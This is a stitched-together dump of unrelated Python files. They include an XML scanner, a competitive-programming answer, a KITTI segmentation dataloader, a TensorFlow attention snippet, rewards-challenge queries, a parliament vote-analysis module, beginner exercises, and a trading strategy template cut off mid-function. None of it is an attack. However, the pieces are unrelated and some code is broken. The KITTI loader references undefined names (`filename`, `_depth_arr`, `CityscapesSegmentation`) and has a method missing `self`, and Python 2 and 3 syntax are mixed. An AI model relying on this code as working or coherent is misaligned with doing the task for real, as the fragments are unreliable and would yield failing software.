if subnode.nodeType == Node.ELEMENT_NODE and re.match(name, subnode.nodeName) is not None:
results.append(subnode)
return results
def recursive_node_scan(node, name):
"""
Replacement function for node.xml_xpath('.//name').
name is a regular expression.
"""
results = node_scan(node, name)
for subnode in node.childNodes:
results.extend(recursive_node_scan(subnode, name))
return results
|
'''
<21.02.22>
made by KH
problem number: 2577
source: https://www.acmicpc.net/problem/2577
'''
inputNumber1 = int(input())
inputNumber2 = int(input())
inputNumber3 = int(input())
productNumber = inputNumber1*inputNumber2*inputNumber3
productNumberStr = str(productNumber)
for i in range(10):
print(productNumberStr.count(str(i))) |
import os
import random
import numpy as np
import scipy.misc as m
from PIL import Image
from torch.utils import data
from torchvision import transforms
from dataloaders import custom_transforms as tr
from dataloaders.SampleLoader import SampleLoader
class KittiSegmentation(data.Dataset):
def __init__(self, cfg, split="train"):
self.root = cfg.DATASET.ROOT
self.split = split
self.cfg = cfg
self.mode = cfg.DATASET.MODE
self.loader = KittiSampleLoader(cfg, split)
self.files = {}
self.images_base = os.path.join(self.root, 'leftImg8bit', self.split)
if split == "val" or split == "test":
self.annotations_base = os.path.join(self.root, 'gtFine', self.split)
else:
self.annotations_base = os.path.join(self.root, cfg.DATASET.CITYSCAPES.GT_MODE, self.split)
self.depth_base = os.path.join(self.root, cfg.DATASET.CITYSCAPES.DEPTH_DIR, self.split) # {}{}'.format(split, year))
# 'troisdorf_000000_000073' is corrupted
self.files[split] = [x for x in self.recursive_glob(rootdir=self.images_base, suffix='.png') if 'troisdorf_000000_000073' not in x]
if not self.files[split]:
raise Exception("No files for split=[%s] found in %s" % (split, self.images_base))
print("Found %d %s images" % (len(self.files[split]), split))
def __len__(self):
return len(self.files[self.split])
def __getitem__(self, index):
img_path, depth_path, lbl_path = self.get_path(index, self.cfg.DATASET.SCRAMBLE_LABELS)
sample = self.loader.load_sample(img_path, depth_path, lbl_path)
sample['id'] = img_path
return sample
def get_path(self, index, scramble_labels=False):
img_path = self.files[self.split][index].rstrip()
depth_path = os.path.join(self.depth_base,
img_path.split(os.sep)[-2],
os.path.basename(img_path)[:-15] + '{}.png'.format(
self.cfg.DATASET.CITYSCAPES.DEPTH_DIR))
gt_mode = 'gtFine' if self.split == 'val' else self.cfg.DATASET.CITYSCAPES.GT_MODE
if scramble_labels:
r_index = random.randrange(0, len(self.files[self.split]))
base_path = self.files[self.split][r_index].rstrip()
else:
base_path = img_path
lbl_path = os.path.join(self.annotations_base,
base_path.split(os.sep)[-2],
os.path.basename(base_path)[:-15] + '{}_labelIds.png'.format(gt_mode))
return img_path, depth_path, lbl_path
def recursive_glob(self, rootdir='.', suffix=''):
"""Performs recursive glob with given suffix and rootdir
:param rootdir is the root directory
:param suffix is the suffix to be searched
"""
return [os.path.join(looproot, filename)
for looproot, _, filenames in os.walk(rootdir)
for filename in filenames if filename.endswith(suffix)]
class KittiSampleLoader(SampleLoader):
def __init__(self, cfg, split="train"):
super().__init__(cfg, cfg.DATASET.MODE, split,
cfg.DATASET.BASE_SIZE, cfg.DATASET.CROP_SIZE)
self.void_classes = [0, 1, 2, 3, 4, 5, 6, 9, 10, 14, 15, 16, 18, 29, 30, -1]
self.valid_classes = [7, 8, 11, 12, 13, \
17, 19, 20, 21, 22, \
23, 24, 25, 26, 27, 28, 31, \
32, 33]
self.class_names = ['road', 'sidewalk', 'building', 'wall', 'fence', \
'pole', 'traffic_light', 'traffic_sign', 'vegetation', 'terrain', \
'sky', 'person', 'rider', 'car', 'truck', 'bus', 'train', \
'motorcycle', 'bicycle']
self.NUM_CLASSES = len(self.valid_classes)
self.ignore_index = 255
self.class_map = dict(zip(self.valid_classes, range(self.NUM_CLASSES)))
def normalizationFactors(self):
if self.mode == "RGBD":
print('Using RGB-D input')
# Data mean and std empirically determined from 1000 Cityscapes samples
self.data_mean = [0.291, 0.329, 0.291, 0.126]
self.data_std = [0.190, 0.190, 0.185, 0.179]
elif self.mode == "RGB":
print('Using RGB input')
self.data_mean = [0.291, 0.329, 0.291]
self.data_std = [0.190, 0.190, 0.185]
elif self.mode == "RGB_HHA":
print('Using RGB HHA input')
self.data_mean = [0.291, 0.329, 0.291, 0.080, 0.621, 0.370]
self.data_std = [0.190, 0.190, 0.185, 0.061, 0.355, 0.196]
def getLabels(self, lbl_path):
_tmp = np.array(Image.open(lbl_path), dtype=np.uint8)
_tmp = self.encode_segmap(_tmp)
_target = Image.fromarray(_tmp)
return _target
def depth_read(filename):
# loads depth map D from png file
# and returns it as a numpy array,
# for details see readme.txt
depth_png = np.array(Image.open(filename), dtype=int)
# make sure we have a proper 16bit depth map here.. not 8bit!
assert (np.max(depth_png) > 255)
depth = depth_png.astype(np.float) / 256.
depth[depth_png == 0] = -1.
return depth
def loadDepth(self, depth_path):
if self.mode == 'RGBD':
# loads depth map D from png file
# and returns it as a numpy array,
# for details see readme.txt
depth_png = np.array(Image.open(filename), dtype=int)
# make sure we have a proper 16bit depth map here.. not 8bit!
assert (np.max(depth_png) > 255)
depth = depth_png.astype(np.float) / 256.
depth[depth_png == 0] = -1.
_depth = Image.fromarray(_depth_arr)
elif self.mode == 'RGB_HHA':
raise ValueError("KITTI Loader for HHA images not implemented")
return _depth
def encode_segmap(self, mask):
# Put all void classes to zero
for _voidc in self.void_classes:
mask[mask == _voidc] = self.ignore_index
for _validc in self.valid_classes:
mask[mask == _validc] = self.class_map[_validc]
return mask
if __name__ == '__main__':
from dataloaders.config.defaults import get_cfg_defaults
from dataloaders.utils import decode_segmap, sample_distribution
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import argparse
parser = argparse.ArgumentParser(description="Test cityscapes Loader")
parser.add_argument('config_file', help='config file path')
parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
args = parser.parse_args()
cfg = get_cfg_defaults()
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
print(cfg)
cityscapes_train = CityscapesSegmentation(cfg, split='val')
dataloader = DataLoader(cityscapes_train, batch_size=2, shuffle=False, num_workers=2)
for ii, sample in enumerate(dataloader):
print(sample["id"])
# for jj in range(sample["image"].size()[0]):
# try:
# img = sample['image']
# gt = sample['label'].numpy()
# tmp = np.array(gt[jj]).astype(np.uint8)
# segmap = decode_segmap(tmp, dataset='cityscapes')
# img_tmp = cityscapes_train.loader.invert_normalization(img[jj])
# plt.figure()
# plt.title('display')
# plt.subplot(131)
# plt.imshow(img_tmp[:, :, :3])
# plt.subplot(132)
# plt.imshow(img_tmp[:, :, 3:].squeeze())
# plt.subplot(133)
# plt.imshow(segmap)
# except SystemError as e:
# print(e)
if ii == 10:
break
# plt.show(block=True)
# print(sample_distribution(cityscapes_train))
|
from server.util import Plugin
# Logs the player into the world messaging system, then allows other users to Private Message the logged in user
def pmaccess(player):
player.getPA().logIntoPM() |
#paper
#Reasoning about Entailment with Neural Attention
#https://arxiv.org/pdf/1509.06664v1.pdf
import tensorflow as tf
import numpy as np
batch_size = 3
seq_len = 5
dim = 2
# [batch_size x seq_len x dim] -- hidden states
Y = tf.constant(np.random.randn(batch_size, seq_len, dim), tf.float32)
# [batch_size x dim] -- h_N
h = tf.constant(np.random.randn(batch_size, dim), tf.float32)
initializer = tf.random_uniform_initializer()
W = tf.get_variable("weights_Y", [dim, dim], initializer=initializer)
w = tf.get_variable("weights_w", [dim], initializer=initializer)
# [batch_size x seq_len x dim] -- tanh(W^{Y}Y)
M = tf.tanh(tf.einsum("aij,jk->aik", Y, W))
# [batch_size x seq_len] -- softmax(Y w^T)
a = tf.nn.softmax(tf.einsum("aij,j->ai", M, w))
# [batch_size x dim] -- Ya^T
r = tf.einsum("aij,ai->aj", Y, a)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
a_val, r_val = sess.run([a, r])
print("a:", a_val, "\nr:", r_val)
#I came across this here https://stackoverflow.com/questions/42507030/implementing-attention-in-tensorflow
|
from collections import defaultdict
from functools import reduce
from typing import DefaultDict, Dict, List, Optional, Tuple, TypedDict, cast
from sqlalchemy import and_
from sqlalchemy.orm import Session
from src.challenges.challenge_event_bus import ChallengeEventBus
from src.models.rewards.challenge import Challenge, ChallengeType
from src.models.rewards.challenge_disbursement import ChallengeDisbursement
from src.models.rewards.user_challenge import UserChallenge
class ChallengeResponse(TypedDict):
challenge_id: str
user_id: int
specifier: str
is_complete: bool
is_active: bool # need this
is_disbursed: bool # need this
current_step_count: Optional[int]
max_steps: Optional[int]
challenge_type: str
amount: str
metadata: Dict
def rollup_aggregates(
user_challenges: List[UserChallenge], parent_challenge: Challenge
) -> ChallengeResponse:
num_complete = reduce(
lambda acc, cur: cast(int, acc) + 1 if cur.is_complete else acc,
user_challenges,
0,
)
# The parent challenge should have a step count, otherwise, we can just
# say it's complete.
if parent_challenge.step_count:
is_complete = num_complete >= parent_challenge.step_count
else:
is_complete = True
response_dict: ChallengeResponse = {
"challenge_id": parent_challenge.id,
"user_id": user_challenges[0].user_id,
"specifier": "",
"is_complete": is_complete,
"current_step_count": num_complete,
"max_steps": parent_challenge.step_count,
"challenge_type": parent_challenge.type,
"is_active": parent_challenge.active,
"is_disbursed": False, # This doesn't indicate anything for aggregate challenges
"amount": parent_challenge.amount,
"metadata": {},
}
return response_dict
def to_challenge_response(
user_challenge: UserChallenge,
challenge: Challenge,
disbursement: ChallengeDisbursement,
metadata: Dict,
) -> ChallengeResponse:
return {
"challenge_id": challenge.id,
"user_id": user_challenge.user_id,
"specifier": user_challenge.specifier,
"is_complete": user_challenge.is_complete,
"current_step_count": user_challenge.current_step_count,
"max_steps": challenge.step_count,
"challenge_type": challenge.type,
"is_active": challenge.active,
"is_disbursed": disbursement is not None,
"amount": challenge.amount,
"metadata": metadata,
}
def create_empty_user_challenges(
user_id: int, challenges: List[Challenge], metadatas: List[Dict]
) -> List[ChallengeResponse]:
user_challenges: List[ChallengeResponse] = []
for i, challenge in enumerate(challenges):
user_challenge: ChallengeResponse = {
"challenge_id": challenge.id,
"user_id": user_id,
"specifier": "",
"is_complete": False,
"current_step_count": 0,
"max_steps": challenge.step_count,
"challenge_type": challenge.type,
"is_active": challenge.active,
"is_disbursed": False,
"amount": challenge.amount,
"metadata": metadatas[i],
}
user_challenges.append(user_challenge)
return user_challenges
def get_challenges_metadata(
session: Session,
event_bus: ChallengeEventBus,
challenges: List[UserChallenge],
) -> List[Dict]:
# Break it up into map per challenge type
challenge_map: Dict[str, List[str]] = defaultdict(lambda: [])
specifier_metadata_map: Dict[str, Dict] = {}
for challenge in challenges:
challenge_map[challenge.challenge_id].append(challenge.specifier)
for challenge_type, specifiers in challenge_map.items():
manager = event_bus.get_manager(challenge_type)
metadatas = manager.get_metadata(session, specifiers)
for i, specifier in enumerate(specifiers):
metadata = metadatas[i]
specifier_metadata_map[specifier] = metadata
# Finally, re-sort the metadata
return [specifier_metadata_map[c.specifier] for c in challenges]
def get_empty_metadata(event_bus: ChallengeEventBus, challenges: List[Challenge]):
return [event_bus.get_manager(c.id).get_default_metadata() for c in challenges]
# gets challenges, returning:
# - any existing user_challenge, rolling up aggregate ones
# - for active, non-hidden challenges, returns default state
# - ignores inactive + completed, unless show_historical is true
def get_challenges(
user_id: int,
show_historical: bool,
session: Session,
event_bus: ChallengeEventBus,
) -> List[ChallengeResponse]:
challenges_and_disbursements: List[Tuple[UserChallenge, ChallengeDisbursement]] = (
session.query(UserChallenge, ChallengeDisbursement)
# Need to do outerjoin because some challenges
# may not have disbursements
.outerjoin(
ChallengeDisbursement,
and_(
ChallengeDisbursement.specifier == UserChallenge.specifier,
ChallengeDisbursement.challenge_id == UserChallenge.challenge_id,
),
).filter(UserChallenge.user_id == user_id)
).all()
# Filter to challenges that have active managers
# (in practice, all challenge should)
challenges_and_disbursements = [
c
for c in challenges_and_disbursements
if event_bus.does_manager_exist(c[0].challenge_id)
]
# Combine aggregates
all_challenges: List[Challenge] = (session.query(Challenge)).all()
all_challenges_map = {challenge.id: challenge for challenge in all_challenges}
# grab user challenges
# if not historical, filter only to *active* challenges
existing_user_challenges: List[UserChallenge] = [
i[0]
for i in challenges_and_disbursements
if show_historical or all_challenges_map[i[0].challenge_id].active
]
disbursements: List[ChallengeDisbursement] = [
i[1] for i in challenges_and_disbursements
]
regular_user_challenges: List[ChallengeResponse] = []
aggregate_user_challenges_map: DefaultDict[str, List[UserChallenge]] = defaultdict(
lambda: []
)
# Get extra metadata
existing_metadata = get_challenges_metadata(
session, event_bus, existing_user_challenges
)
for i, user_challenge in enumerate(existing_user_challenges):
parent_challenge = all_challenges_map[user_challenge.challenge_id]
if parent_challenge.type == ChallengeType.aggregate:
# Filter out aggregate user_challenges that aren't complete.
# this probably shouldn't even happen (what does it mean?)
if user_challenge.is_complete:
aggregate_user_challenges_map[user_challenge.challenge_id].append(
user_challenge
)
else:
# If we're a trending challenge, don't add if the user_challenge is incomplete
if (
parent_challenge.type == ChallengeType.trending
and not user_challenge.is_complete
):
continue
user_challenge_dict = to_challenge_response(
user_challenge,
parent_challenge,
disbursements[i],
existing_metadata[i],
)
override_step_count = event_bus.get_manager(
parent_challenge.id
).get_override_challenge_step_count(session, user_id)
if override_step_count is not None and not user_challenge.is_complete:
user_challenge_dict["current_step_count"] = override_step_count
regular_user_challenges.append(user_challenge_dict)
rolled_up: List[ChallengeResponse] = []
for challenge_id, challenges in aggregate_user_challenges_map.items():
parent_challenge = all_challenges_map[challenge_id]
rolled_up.append(rollup_aggregates(challenges, parent_challenge))
# Return empty user challenges for active challenges that are non-hidden
# and visible for the current user
active_non_hidden_challenges: List[Challenge] = [
challenge
for challenge in all_challenges
if (
challenge.active
and not challenge.type == ChallengeType.trending
and event_bus.get_manager(challenge.id).should_show_challenge_for_user(
session, user_id
)
)
]
existing_challenge_ids = {
user_challenge.challenge_id for user_challenge in existing_user_challenges
}
needs_user_challenge = [
challenge
for challenge in active_non_hidden_challenges
if challenge.id not in existing_challenge_ids
]
empty_metadata = get_empty_metadata(event_bus, needs_user_challenge)
empty_challenges = create_empty_user_challenges(
user_id, needs_user_challenge, empty_metadata
)
combined = regular_user_challenges + rolled_up + empty_challenges
return combined
|
from django.contrib import admin
from .models import Example
from django_gaode_maps.widgets import LocationWidget
from django_gaode_maps.fields import LocationField
@admin.register(Example)
class ExampleAdmin(admin.ModelAdmin):
fields = ["address", "city", "postal_code", "location"]
formfield_overrides = {
LocationField: {'widget': LocationWidget},
} |
def print_max(x,y):
'''Prints the max of 2 numbers.
The two values must be integers.'''
#convert to int if possible
x = int(x)
y = int(y)
if x > y:
print x, ' is maximum'
else:
print y, ' is maximum'
print_max(3,5)
print print_max.__doc__
#docstrings: a multi-line string where the first line starts with a capital letter and ends with a dot.
# Then the second line is blank followed by any detailed explanation starting from third line.
|
m,p=map(int,input().split())
l2=list(map(int,input().strip().split()))[:m]
for i in range(0,m):
if(l2[i]==p):
print("yes")
break
else:
print("no")
|
# coding: utf-8
from django.shortcuts import get_object_or_404
from parlaseje.models import *
from sklearn.decomposition import PCA
from numpy import argpartition
import pandas as pd
import requests
import json
from collections import Counter
from parlaseje.models import Vote_analysis
from parlalize.settings import API_URL
from parlaskupine.models import Organization, IntraDisunion
from parlalize.utils import printProgressBar
def setOutliers():
all_votes = Vote.objects.all()
all_votes.update(is_outlier=False)
all_votes_as_list = list(all_votes)
all_votes_as_vectors = [(vote.votes_for, vote.against, vote.abstain, vote.not_present) for vote in all_votes_as_list]
pca = PCA(n_components=1)
pca.fit(all_votes_as_vectors)
distances = pca.score_samples(all_votes_as_vectors)
number_of_samples = len(all_votes_as_list)/4
idx = argpartition(distances, number_of_samples)[:number_of_samples]
vote_ids = [all_votes[i].id for i in idx]
outlierVotes = Vote.objects.filter(id__in=vote_ids)
outlierVotes.update(is_outlier=True)
return 'finished'
def setMotionAnalize(request, session_id):
"""
request argument is here just because runner put 2 arguments in setter
setMotionAnalyze
setIntraDisunion
"""
session = get_object_or_404(Session, id_parladata=session_id)
url = API_URL + '/getVotesOfSessionTable/' + str(session_id) + '/'
data = pd.read_json(url)
if data.empty:
return
coalition = requests.get(API_URL + '/getCoalitionPGs').json()['coalition']
partys = Organization.objects.filter(classification='poslanska skupina')
paries_ids = partys.values_list('id_parladata', flat=True)
orgs = requests.get(API_URL + '/getAllPGsExt/')
data['option_ni'] = 0
data['option_za'] = 0
data['option_proti'] = 0
data['option_kvorum'] = 0
data.loc[data['option'] == 'ni', 'option_ni'] = 1
data.loc[data['option'] == 'za', 'option_za'] = 1
data.loc[data['option'] == 'proti', 'option_proti'] = 1
data.loc[data['option'] == 'kvorum', 'option_kvorum'] = 1
data['voter_unit'] = 1
data['is_coalition'] = 0
data.loc[data['voterparty'].isin(coalition), 'is_coalition'] = 1
#za proti ni kvorum
all_votes = data.groupby('vote_id').sum()
all_votes['max_option_percent'] = all_votes.apply(lambda row: getPercent(row['option_za'], row['option_proti'], row['option_kvorum'], row['option_ni']), axis=1)
m_proti = data[data.option_proti == 1].groupby(['vote_id']).apply(lambda x: x["voter"])
m_za = data[data.option_za == 1].groupby(['vote_id']).apply(lambda x: x["voter"])
m_ni = data[data.option_ni == 1].groupby(['vote_id']).apply(lambda x: x["voter"])
m_kvorum = data[data.option_kvorum == 1].groupby(['vote_id']).apply(lambda x: x["voter"])
pg_proti = data[data.option_proti == 1].groupby(['vote_id']).apply(lambda x: x["voterparty"])
pg_za = data[data.option_za == 1].groupby(['vote_id']).apply(lambda x: x["voterparty"])
pg_ni = data[data.option_ni == 1].groupby(['vote_id']).apply(lambda x: x["voterparty"])
pg_kvorum = data[data.option_kvorum == 1].groupby(['vote_id']).apply(lambda x: x["voterparty"])
all_votes['m_proti'] = all_votes.apply(lambda row: getMPsList(row, m_proti), axis=1)
all_votes['m_za'] = all_votes.apply(lambda row: getMPsList(row, m_za), axis=1)
all_votes['m_ni'] = all_votes.apply(lambda row: getMPsList(row, m_ni), axis=1)
all_votes['m_kvorum'] = all_votes.apply(lambda row: getMPsList(row, m_kvorum), axis=1)
all_votes['pg_proti'] = all_votes.apply(lambda row: getPGsList(row, pg_proti), axis=1)
all_votes['pg_za'] = all_votes.apply(lambda row: getPGsList(row, pg_za), axis=1)
all_votes['pg_ni'] = all_votes.apply(lambda row: getPGsList(row, pg_ni), axis=1)
all_votes['pg_kvorum'] = all_votes.apply(lambda row: getPGsList(row, pg_kvorum), axis=1)
all_votes['coal'] = data[data.is_coalition == 1].groupby(['vote_id']).sum().apply(lambda row: getOptions(row, 'coal'), axis=1)
all_votes['oppo'] = data[data.is_coalition == 0].groupby(['vote_id']).sum().apply(lambda row: getOptions(row, 'oppo'), axis=1)
parties = data.groupby(['vote_id',
'voterparty']).sum().apply(lambda row: getOptions(row,
'ps'), axis=1)
partyBallots = data.groupby(['vote_id',
'voterparty']).sum().apply(lambda row: getPartyBallot(row), axis=1)
partyIntryDisunion = data.groupby(['vote_id', 'voterparty']).sum().apply(lambda row: getIntraDisunion(row), axis=1)
# TODO: create save-ing for coalInter, oppoInter
coalInterCalc = data[data.is_coalition == 1].groupby(['vote_id']).sum().apply(lambda row: getIntraDisunion(row), axis=1)
oppoInterCalc = data[data.is_coalition == 0].groupby(['vote_id']).sum().apply(lambda row: getIntraDisunion(row), axis=1)
allInter = data.groupby(['vote_id']).sum().apply(lambda row: getIntraDisunion(row), axis=1)
opozition = Organization.objects.get(name="Opozicija")
coalition = Organization.objects.get(name="Koalicija")
for vote_id in all_votes.index.values:
vote = Vote.objects.get(id_parladata=vote_id)
vote_a = Vote_analysis.objects.filter(vote__id_parladata=vote_id)
party_data = {}
has_outliers = False
for party in parties[vote_id].keys():
# save just parlimetary groups
if party in paries_ids:
party_data[party] = parties[vote_id][party]
if json.loads(party_data[party])['outliers']:
has_outliers = True
# update/add IntraDisunion
intra = IntraDisunion.objects.filter(organization__id_parladata=party,
vote=vote)
if intra:
intra.update(maximum=partyIntryDisunion[vote_id][party])
else:
org = Organization.objects.get(id_parladata=party)
IntraDisunion(organization=org,
vote=vote,
maximum=partyIntryDisunion[vote_id][party]
).save()
# save org Ballot
options = json.loads(partyBallots[vote_id][party])
for option in options:
# if ballot doesn't exist then create it
if not Ballot.objects.filter(org_voter__id_parladata=party,
vote__id_parladata=vote_id,
option=option):
org = Organization.objects.get(id_parladata=party)
Ballot(vote=vote,
org_voter=org,
option=option,
start_time=vote.start_time,
session=vote.session).save()
opoIntra = IntraDisunion.objects.filter(organization=opozition,
vote=vote)
coalIntra = IntraDisunion.objects.filter(organization=coalition,
vote=vote)
if opoIntra:
opoIntra.update(maximum=oppoInterCalc[vote_id])
else:
IntraDisunion(organization=opozition,
vote=vote,
maximum=oppoInterCalc[vote_id]
).save()
if coalIntra:
coalIntra.update(maximum=coalInterCalc[vote_id])
else:
IntraDisunion(organization=coalition,
vote=vote,
maximum=coalInterCalc[vote_id]
).save()
vote.has_outlier_voters = has_outliers
vote.intra_disunion = allInter[vote_id]
vote.save()
print all_votes.loc[vote_id, 'pg_za']
if vote_a:
vote_a.update(votes_for=all_votes.loc[vote_id, 'option_za'],
against=all_votes.loc[vote_id, 'option_proti'],
abstain=all_votes.loc[vote_id, 'option_kvorum'],
not_present=all_votes.loc[vote_id, 'option_ni'],
pgs_data=party_data,
mp_yes=all_votes.loc[vote_id, 'm_za'],
mp_no=all_votes.loc[vote_id, 'm_proti'],
mp_np=all_votes.loc[vote_id, 'm_ni'],
mp_kvor=all_votes.loc[vote_id, 'm_kvorum'],
coal_opts=all_votes.loc[vote_id, 'coal'],
oppo_opts=all_votes.loc[vote_id, 'oppo'])
else:
Vote_analysis(session=session,
vote=vote,
created_for=vote.start_time,
votes_for=all_votes.loc[vote_id, 'option_za'],
against=all_votes.loc[vote_id, 'option_proti'],
abstain=all_votes.loc[vote_id, 'option_kvorum'],
not_present=all_votes.loc[vote_id, 'option_ni'],
pgs_data=party_data,
mp_yes=all_votes.loc[vote_id, 'm_za'],
mp_no=all_votes.loc[vote_id, 'm_proti'],
mp_np=all_votes.loc[vote_id, 'm_ni'],
mp_kvor=all_votes.loc[vote_id, 'm_kvorum'],
coal_opts=all_votes.loc[vote_id, 'coal'],
oppo_opts=all_votes.loc[vote_id, 'oppo']).save()
def getPercent(a, b, c, d=None):
a = 0 if pd.isnull(a) else a
b = 0 if pd.isnull(b) else b
c = 0 if pd.isnull(c) else c
if d:
d = 0 if pd.isnull(d) else d
devizer = float(sum([a, b, c, d]))
if devizer:
return max(a, b, c, d) / devizer * 100
else:
return 0
else:
devizer = float(sum([a, b, c]))
if devizer:
return max(a, b, c) / devizer * 100
else:
return 0
def getMPsList(row, proti):
try:
return json.dumps(list(proti[row.name].reset_index()['voter']))
except:
try:
# fix if session has one vote
return json.dumps(list(proti.values[0]))
except:
return json.dumps([])
def getPGsList(row, proti):
try:
pgs = [str(pg) for pg in list(proti[row.name].reset_index()['voterparty'])]
return json.dumps(dict(Counter(pgs)))
except:
return json.dumps({})
def getPartyBallot(row):
"""
using for set ballot of party:
methodology: ignore not_present
"""
stats = {'za': row['option_za'],
'proti': row['option_proti'],
'kvorum': row['option_kvorum'],
'ni': row['option_ni']}
if max(stats.values()) == 0:
return '[]'
max_ids = [key for key, val in stats.iteritems() if val == max(stats.values())]
return json.dumps(max_ids)
def getIntraDisunion(row):
maxOptionPercent = getPercent(row['option_za'],
row['option_proti'],
row['option_kvorum'])
if maxOptionPercent == 0:
return 0
return 100 - maxOptionPercent
def getOptions(row, side):
maxOptionPercent = getPercent(row['option_za'],
row['option_proti'],
row['option_kvorum'],
row['option_ni'])
stats = {'for': row['option_za'],
'against': row['option_proti'],
'abstain': row['option_kvorum'],
'not_present': row['option_ni']}
max_opt = max(stats, key=stats.get)
max_ids = [key for key, val in stats.iteritems() if val == max(stats.values())]
if len(max_ids) > 1:
if 'not_present' in max_ids:
max_ids.remove('not_present')
if len(max_ids) > 1:
max_vote = 'cant_compute'
else:
max_vote = max_ids[0]
else:
max_vote = 'cant_compute'
else:
max_vote = max_ids[0]
outliers = []
if side == 'oppo':
# if side is oppozition don't show outliers
pass
#if max_vote != 'not_present':
# outliers = [opt for opt in ['for', 'against'] if stats[opt]]
else:
if max_vote != 'not_present':
outliers = [opt for opt in ['abstain', 'for', 'against'] if stats[opt]]
for opt in max_ids:
if opt in outliers:
outliers.remove(opt)
return json.dumps({'votes': {
'for': row['option_za'],
'against': row['option_proti'],
'abstain': row['option_kvorum'],
'not_present': row['option_ni'],
},
'max': {
'max_opt': max_vote,
'maxOptPerc': maxOptionPercent
},
'outliers': outliers})
def updateMotionAnalizeOfAllSessions():
dz_sessions = Session.objects.filter(organization__id_parladata=95)
session_ids = list(dz_sessions.values_list("id_parladata", flat=True))
for session_id in session_ids:
printProgressBar(session_ids.index(session_id), len(session_ids), prefix='Sessions: ')
setMotionAnalize(None, str(session_id))
|
#Q1 To find area of a circle
def SetArea ():
radius = int(input('enter the radius'))
myarea =3.14*radius** 2
return myarea
print(SetArea())
#Q2 Finding perfect number
def perfect(x):
list=[]
for i in range(1,x ):#finding factors except number itself
if x % i == 0:
list.append(i)
return list
x=int(input('enter a number'))
list2=[]
list3=[]
list2=perfect(x)
if sum(list2)==x: #condition for perfect number
print('it is a perfect number')
list3=x
print('perfect number',list3)
else:
print('it is not a perfect number')
#Q3Printing table of 12
def timetable(n, time=1):#here time tell the number we have to multiply our n with
if time <= 10:
print(n,'*',time,'=',n*time)
timetable(n, time+1)
else:
return
timetable(12)
#Q4 Write a function to calculate power of a number raised to other ( a^b ) using recursion.
def power(a,b):
if b == 0:
return 1
if b >= 1:
return a * power(a, b - 1)
print(power(a=int(input("enter the number")),b=int(input("enter the number"))))
#Q5 Write a function to find factorial of a number but also store the factorials calculated in a dictionary
dict={}
def factorial(n):
if n == 0:
return 1
else:
return n * factorial(n-1)
n=int(input('enter a number'))
dict['factorial']=factorial(n) #storing factorial in dictionary
print(dict)
|
# encoding: UTF-8
from socketIO_client import SocketIO
from EventConstant import *
from Config import *
from RtConstant import *
from RtObject import *
import requests
import json
basetPath = "http://" + host + ":" + str(httpPort) + "/api"
class StrategyTemplate:
def __init__(self):
self.tickIDSet = set()
self.originalOrderIDSet = set()
def getData(self, uri):
try:
payload = {'token': token}
response = requests.get(basetPath + uri, params=payload)
responseJson = json.loads(response.content)
if 200 <= response.status_code < 300 and responseJson['status'] == 'success':
return responseJson['data']
else:
log.error(response)
return []
except Exception, e:
log.error(e)
return []
def sendOrder(self, orderReq):
self.originalOrderIDSet.add(orderReq.originalOrderID)
try:
postData = {'token': token}
postData.update(orderReq.__dict__)
response = requests.post(basetPath + '/core/sendOrder', json=postData)
responseJson = json.loads(response.content)
if 200 <= response.status_code < 300 and responseJson['status'] == 'success':
return responseJson['data']
else:
log.error(response)
return None
except Exception, e:
log.error(e)
return None
def buy(self, symbol, volume, price, exchange, rtAccountID):
orderReq = OrderReq()
orderReq.rtAccountID = rtAccountID
orderReq.exchange = exchange
orderReq.volume = volume
orderReq.price = price
orderReq.symbol = symbol
orderReq.rtSymbol = symbol+"."+exchange
orderReq.offset = OFFSET_OPEN
orderReq.direction = DIRECTION_LONG
orderReq.priceType = PRICETYPE_LIMITPRICE
self.sendOrder(orderReq)
def sell(self, symbol, volume, price, exchange, rtAccountID):
orderReq = OrderReq()
orderReq.rtAccountID = rtAccountID
orderReq.exchange = exchange
orderReq.volume = volume
orderReq.price = price
orderReq.symbol = symbol
orderReq.rtSymbol = symbol+"."+exchange
orderReq.offset = OFFSET_CLOSE
orderReq.direction = DIRECTION_SHORT
orderReq.priceType = PRICETYPE_LIMITPRICE
self.sendOrder(orderReq)
def sellTd(self, symbol, volume, price, exchange, rtAccountID):
orderReq = OrderReq()
orderReq.rtAccountID = rtAccountID
orderReq.exchange = exchange
orderReq.volume = volume
orderReq.price = price
orderReq.symbol = symbol
orderReq.rtSymbol = symbol+"."+exchange
orderReq.offset = OFFSET_CLOSETODAY
orderReq.direction = DIRECTION_SHORT
orderReq.priceType = PRICETYPE_LIMITPRICE
self.sendOrder(orderReq)
def sellYd(self, symbol, volume, price, exchange, rtAccountID):
orderReq = OrderReq()
orderReq.rtAccountID = rtAccountID
orderReq.exchange = exchange
orderReq.volume = volume
orderReq.price = price
orderReq.symbol = symbol
orderReq.rtSymbol = symbol+"."+exchange
orderReq.offset = OFFSET_CLOSEYESTERDAY
orderReq.direction = DIRECTION_SHORT
orderReq.priceType = PRICETYPE_LIMITPRICE
self.sendOrder(orderReq)
def sellShort(self, symbol, volume, price, exchange, rtAccountID):
orderReq = OrderReq()
orderReq.rtAccountID = rtAccountID
orderReq.exchange = exchange
orderReq.volume = volume
orderReq.price = price
orderReq.symbol = symbol
orderReq.rtSymbol = symbol+"."+exchange
orderReq.offset = OFFSET_OPEN
orderReq.direction = DIRECTION_SHORT
orderReq.priceType = PRICETYPE_LIMITPRICE
self.sendOrder(orderReq)
def buyToCover(self, symbol, volume, price, exchange, rtAccountID):
orderReq = OrderReq()
orderReq.rtAccountID = rtAccountID
orderReq.exchange = exchange
orderReq.volume = volume
orderReq.price = price
orderReq.symbol = symbol
orderReq.rtSymbol = symbol+"."+exchange
orderReq.offset = OFFSET_CLOSE
orderReq.direction = DIRECTION_LONG
orderReq.priceType = PRICETYPE_LIMITPRICE
self.sendOrder(orderReq)
def buyToCoverTd(self, symbol, volume, price, exchange, rtAccountID):
orderReq = OrderReq()
orderReq.rtAccountID = rtAccountID
orderReq.exchange = exchange
orderReq.volume = volume
orderReq.price = price
orderReq.symbol = symbol
orderReq.rtSymbol = symbol+"."+exchange
orderReq.offset = OFFSET_CLOSETODAY
orderReq.direction = DIRECTION_LONG
orderReq.priceType = PRICETYPE_LIMITPRICE
self.sendOrder(orderReq)
def buyToCoverYd(self, symbol, volume, price, exchange, rtAccountID):
